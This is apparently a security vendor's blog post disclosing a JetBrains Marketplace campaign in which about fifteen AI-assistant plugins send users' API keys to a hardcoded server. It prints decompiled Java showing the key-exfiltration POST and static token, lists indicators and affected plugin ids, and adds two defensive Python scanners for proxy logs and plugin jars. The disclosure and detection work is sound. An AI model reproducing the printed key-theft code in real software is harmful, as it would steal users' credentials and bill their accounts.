Aikido

Multiple JetBrains IDE plugins caught stealing AI keys

Written by
Ilyas Makari

We detected a coordinated malware campaign on the JetBrains Marketplace. At least 15 IDE plugins, published under seven vendor accounts, share the same hidden behavior: each one exfiltrates the AI provider API key that you paste into its settings. Together they have been installed close to 70,000 times.

Every plugin poses as an AI coding assistant built on DeepSeek and other large language models, offering chat, commit messages, code review, bug finding, and unit tests. They function exactly as advertised. However, the AI provider API key you enter gets exfiltrated to a server controlled by the attacker.

The earliest versions appeared at the end of October 2025, and new ones are still being released in June 2026. The real impact is hard to measure, since vendors can inflate download counts and the marketplace listings also carry fake five-star reviews.

The affected plugins are listed at the end of the article.

How the theft works

All fifteen plugins share a similar codebase that has been renamed and repackaged for each listing. To use any of them, you open the settings panel and paste in an API key for a provider such as OpenAI, SiliconFlow, or DeepSeek. The plugin needs that key to call the model on your behalf, so handing it over feels routine.

The moment you click Apply, the settings handler calls save(), which persists your key and also forwards it to the attacker. The call fires on key entry, with no prompt, no consent screen, and no mention anywhere in the user interface. Note the gate in the condition: only a key that starts with sk-, is exactly 51 characters long (the classic OpenAI secret key format) and has not been sent before gets forwarded, so the thief is tuned to one key format rather than grabbing everything you paste in.

// runs inside the settings apply() handler, the instant you save your key
public static void save(String key) {
    // gate: "sk-" prefix, exactly 51 characters, and not sent before
    // (ks is a Set; add() returns false when the key was already seen)
    if (key != null && key.startsWith("sk-") && ks.add(key) && StringUtils.length(key) == 51) {
        SoftwareDto dto = new SoftwareDto();
        dto.setApiKey(key);          // your provider secret
        BaseUtil.request("key", dto); // POST to /api/software/key on the attacker server
    }
}


// the network call that leaves your machine (connection is the HttpURLConnection opened on url)
// name is the first argument to BaseUtil.request(): "key" or "check"
URL url = new URI("http://39.107.60[.]51/api/software/" + name).toURL();
connection.setRequestMethod("POST");
connection.setRequestProperty("X-Api-Key", "F48D2AA7CF341F782C1D"); // static token hardcoded into the plugin
byte[] input = new Gson().toJson(vo).getBytes(StandardCharsets.UTF_8); // vo holds your apiKey, serialized as JSON

The destination is a hardcoded server at 39.107.60[.]51, reached over plain HTTP and authenticated with a static X-Api-Key token baked into the plugin. Given the request() calls, the paths are /api/software/key for the stolen key and /api/software/check for the paid tier described below. Your key travels as plaintext JSON to an address that has nothing to do with any legitimate AI provider, and because the transport is unencrypted, anyone on the network path can read it as well.
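If you run outbound traffic through a proxy, the hardcoded endpoint above is easy to hunt for. The following is an added example, not code from the plugins or from Aikido: it reads Squid's native access-log format (assumed here; adapt the parser for your own proxy), flags POSTs to the C2 host or to the /api/software/key and /api/software/check paths taken from the snippet above, and rates a bare path match lower than a host match because the path is generic enough to collide with unrelated software. The log lines are constructed for the demo, not real traffic.

```python
"""Flag proxy-log requests to the exfiltration endpoint hardcoded in these plugins.

Added example, not code from the plugins or from Aikido. Indicators come from the
decompiled snippet: host 39.107.60.51 (defanged on the page as 39.107.60[.]51),
plain HTTP, POST to /api/software/<name> where name is "key" or "check".
"""
import re
from urllib.parse import urlparse

C2_HOSTS = {"39.107.60.51"}
C2_PATH = re.compile(r"^/api/software/(key|check)$")

# Constructed sample in Squid native access-log format; not real traffic.
# Fields: timestamp elapsed client code/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
1749636134.512     45 10.0.0.12 TCP_MISS/200 318 POST http://39.107.60.51/api/software/key - HIER_DIRECT/39.107.60.51 application/json
1749636140.101    120 10.0.0.12 TCP_MISS/200 2210 POST https://api.openai.com/v1/chat/completions - HIER_DIRECT/104.18.7.192 application/json
1749636201.770     30 10.0.0.31 TCP_MISS/200 402 POST http://39.107.60.51/api/software/check - HIER_DIRECT/39.107.60.51 application/json
1749636230.004     12 10.0.0.31 TCP_MISS/200 88 POST http://203.0.113.9/api/software/check - HIER_DIRECT/203.0.113.9 application/json
1749636244.310      9 10.0.0.40 TCP_MISS/404 66 GET http://example.com/api/software/key - HIER_DIRECT/93.184.216.34 text/html
"""


def parse_squid_line(line):
    """Return the fields we need from one Squid native log line, or None if malformed."""
    fields = line.split()
    if len(fields) < 7:
        return None
    timestamp, _elapsed, client, _status, _size, method, url = fields[:7]
    return {"ts": timestamp, "client": client, "method": method, "url": url}


def classify(rec):
    """Return (severity, reasons) for one request; severity is None when nothing matched."""
    parsed = urlparse(rec["url"])
    host = parsed.hostname or ""
    reasons = []
    if host in C2_HOSTS:
        reasons.append("destination is the hardcoded C2 host")
    # A path match alone is weaker evidence, so it only counts for POST (the
    # plugin always POSTs) and is rated below a host match.
    if rec["method"] == "POST" and C2_PATH.match(parsed.path):
        reasons.append("POST to the /api/software/{key,check} exfil path")
    if not reasons:
        return None, []
    if parsed.scheme == "http":
        reasons.append("plaintext HTTP, so the key crossed the network unencrypted")
    severity = "high" if host in C2_HOSTS else "medium"
    return severity, reasons


def find_exfil(log_text):
    """Scan a whole log and return a list of (client, url, severity, reasons)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_squid_line(line)
        if rec is None:
            continue
        severity, reasons = classify(rec)
        if severity:
            hits.append((rec["client"], rec["url"], severity, reasons))
    return hits


if __name__ == "__main__":
    for client, url, severity, reasons in find_exfil(SAMPLE_LOG):
        print(f"[{severity}] {client} -> {url}: {'; '.join(reasons)}")
```

A high hit tells you which internal client had one of the plugins installed with a key entered; from there, the client address is your pivot to the developer whose key needs revoking.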

The plugins also run a paid tier. After a user pays a small fee through the donation wall built into the plugin, the server sends an API key back to the client, and the plugin starts using that key for its model calls instead of the user's own. This is bizarre: no legitimate operator would hand a user a working, unrestricted key to a paid AI provider.

// paid tier: after the donation wall, the client calls /api/software/check
WebResult webResult = BaseUtil.request("check", vo);
if (webResult.isSuccess()) {
    key = data.getApiKey();  // data: the response payload; a key handed back by the attacker server
}


// the plugin always prefers the server supplied key over the one you typed
public static String getKey() {
    // defaultIfBlank returns BaseState.key (server supplied) unless it is blank
    return StringUtils.defaultIfBlank(BaseState.key, Value.getKey());
}

One plausible reading is that one group of victims pastes in their own keys, which the server harvests, while a second group pays the operator and receives a working key in return. The keys handed to paying users may well be the keys stolen from everyone else, turning the campaign into a service that resells other people's API access. The operator collects money on one side and free credentials on the other, while the genuine key owners pay the bill.

Why attackers keep aiming at IDEs

Editor plugin ecosystems have become a frequent supply chain target; GlassWorm, an ongoing campaign against VS Code, is one current example. Developer machines are high value, and the IDE sits at the center of them: it holds source code, cloud credentials, signing keys, and now the API keys for paid AI services, which can be resold or burned for compute. A plugin runs unsandboxed inside the IDE, with the IDE's own privileges, in a tool people trust and leave open all day, which makes it an ideal hiding place for code that misbehaves only in the background.

JetBrains plugins do go through a manual review before they reach the marketplace, yet a small piece of logic buried inside an otherwise working plugin can still slip through. Treat a plugin the same way you would treat any dependency that runs with your privileges, and be cautious about pasting long-lived secrets into tools you have not vetted. If you entered a key into any of the plugins listed below, assume it is compromised: revoke it at the provider, issue a new one, and review the provider's usage logs for calls you did not make.

How Aikido detects this

If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.

If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.

For broader coverage across your whole team, Aikido's Device Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.

For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.

Indicators of Compromise

Network indicators

  • C2 server IP: 39.107.60[.]51

Affected plugins (name and plugin id)

  • DeepSeek Junit Test (org.sm.yms.toolkit) – 1,121 downloads, released 2025-10-31
  • DeepSeek Git Commit (com.json.simple.kit) – 1,894 downloads, released 2025-11-01
  • DeepSeek FindBugs (org.bug.find.tools) – 1,485 downloads, released 2025-11-09
  • DeepSeek AI Chat (org.translate.ai.simple) – 1,317 downloads, released 2025-11-23
  • DeepSeek Dev AI (com.yy.test.ai.simple) – 740 downloads, released 2025-11-30
  • DeepSeek AI Coding (com.dev.ai.toolkit) – 450 downloads, released 2025-12-06
  • AI FindBugs (com.json.view.simple) – 623 downloads, released 2025-12-14
  • AI Git Commitor (com.my.git.ai.kit) – 301 downloads, released 2026-01-10
  • AI Coder Review (org.check.ai.ds) – 735 downloads, released 2026-01-11
  • DeepSeek Coder AI (com.review.tool.code) – 3,498 downloads, released 2026-01-15
  • AI Coder Assistant (org.code.assist.dev.tool) – 319 downloads, released 2026-02-01
  • DeepSeek Code Review (com.coder.ai.dpt) – 278 downloads, released 2026-04-18
  • CodeGPT AI Assistant (com.my.code.tools) – 25,571 downloads, released 2026-06-09
  • DeepSeek AI Assist (ord.cp.code.ai.kit) – 27,727 downloads, released 2026-06-10
  • Coding Simple Tool (com.dp.git.ai.tool) – 3,931 downloads, no online versions

Vendor accounts

  • CodePilot (mycode)
  • StackSmith (misshewei)
  • CodeCrafter (keteme)
  • CodeWeaver (simpledev)
  • JetCode (skyblue)
  • DailyCode (dialycode)
  • ZenCoder (947cb4c8-5db1-4cf0-8182-0aae7c433bb3)
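Both the advice above (vet what runs with your privileges) and the indicator list here are easier to act on with a script. The following is an added example, not Aikido's scanner and not code from the plugins: it walks a JetBrains plugins directory, reads the <id> from each jar's META-INF/plugin.xml, compares it with the affected ids listed above, and additionally greps every jar entry for the C2 host, the static X-Api-Key token and the /api/software/ path. The directory layout assumed is the standard one (each plugin as a folder with lib/*.jar, or a bare .jar); the sample plugins it builds for the demo are constructed fixtures, not real plugins.

```python
"""Scan a JetBrains plugins directory for the plugin ids and strings from this campaign.

Added example, not Aikido's scanner and not code from the plugins. Assumed layout:
each installed plugin is a folder with lib/*.jar (or a bare .jar), and one jar
carries META-INF/plugin.xml with an <id> element. Typical locations (verify for
your product and version):
  Linux:   ~/.local/share/JetBrains/<Product><Version>/
  macOS:   ~/Library/Application Support/JetBrains/<Product><Version>/plugins
  Windows: %APPDATA%\\JetBrains\\<Product><Version>\\plugins
"""
import pathlib
import sys
import tempfile
import xml.etree.ElementTree as ET
import zipfile

AFFECTED_IDS = {
    "org.sm.yms.toolkit", "com.json.simple.kit", "org.bug.find.tools",
    "org.translate.ai.simple", "com.yy.test.ai.simple", "com.dev.ai.toolkit",
    "com.json.view.simple", "com.my.git.ai.kit", "org.check.ai.ds",
    "com.review.tool.code", "org.code.assist.dev.tool", "com.coder.ai.dpt",
    "com.my.code.tools", "ord.cp.code.ai.kit", "com.dp.git.ai.tool",
}
# String constants in .class files are stored as (modified) UTF-8, so ASCII
# literals such as the C2 host and the static token are greppable in the raw
# bytes unless the author obfuscated them.
IOC_STRINGS = [b"39.107.60.51", b"F48D2AA7CF341F782C1D", b"/api/software/"]


def plugin_id_from_jar(jar):
    """Read <id> from META-INF/plugin.xml, or None if the jar has no usable descriptor."""
    try:
        node = ET.fromstring(jar.read("META-INF/plugin.xml")).find("id")
    except (KeyError, ET.ParseError):
        return None
    return node.text.strip() if node is not None and node.text else None


def ioc_hits_in_jar(jar):
    """Return the set of IOC strings found anywhere inside the jar's entries."""
    hits = set()
    for info in jar.infolist():
        if info.is_dir():
            continue
        blob = jar.read(info.filename)
        hits.update(ioc.decode() for ioc in IOC_STRINGS if ioc in blob)
    return hits


def scan_plugins_dir(plugins_dir):
    """Walk every jar under plugins_dir and report id matches and IOC string hits."""
    findings = []
    for jar_path in sorted(pathlib.Path(plugins_dir).rglob("*.jar")):
        try:
            with zipfile.ZipFile(jar_path) as jar:
                pid = plugin_id_from_jar(jar)
                iocs = ioc_hits_in_jar(jar)
        except zipfile.BadZipFile:
            continue
        if pid in AFFECTED_IDS or iocs:
            findings.append({
                "jar": str(jar_path),
                "plugin_id": pid,
                "id_on_affected_list": pid in AFFECTED_IDS,
                "iocs": sorted(iocs),
            })
    return findings


def build_sample_plugins_dir(base):
    """Constructed fixture (not real plugins): one benign plugin and one that carries
    an affected id plus the C2 strings inside a fake class entry."""
    base = pathlib.Path(base)
    bad = base / "DeepSeek Coder AI" / "lib"
    bad.mkdir(parents=True)
    with zipfile.ZipFile(bad / "plugin.jar", "w") as z:
        z.writestr("META-INF/plugin.xml",
                   "<idea-plugin><id>com.review.tool.code</id>"
                   "<name>DeepSeek Coder AI</name></idea-plugin>")
        z.writestr("org/example/BaseUtil.class",
                   b"\xca\xfe\xba\xbe" + b"\x00" * 8
                   + b"http://39.107.60.51/api/software/" + b"F48D2AA7CF341F782C1D")
    good = base / "Benign Formatter" / "lib"
    good.mkdir(parents=True)
    with zipfile.ZipFile(good / "benign.jar", "w") as z:
        z.writestr("META-INF/plugin.xml",
                   "<idea-plugin><id>org.example.formatter</id></idea-plugin>")
        z.writestr("org/example/Fmt.class", b"\xca\xfe\xba\xbe" + b"\x00" * 16)
    return base


def demo():
    """Build the fixture in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_plugins_dir(build_sample_plugins_dir(tmp))


if __name__ == "__main__":
    results = scan_plugins_dir(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for f in results:
        print(f"{f['jar']}: id={f['plugin_id']} listed={f['id_on_affected_list']} iocs={f['iocs']}")
    if not results:
        print("no matches")
```

Run it with the plugins directory as the only argument; without one it scans the constructed fixture. An id match is definitive against the list above. The string hits are a heuristic that will miss a repackaged copy with obfuscated constants, and since the campaign is "at least 15" plugins, a clean scan is not proof that nothing else on the machine does the same thing.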
https://www.aikido.dev/blog/multiple-jetbrains-ide-plugins-caught-stealing-ai-keys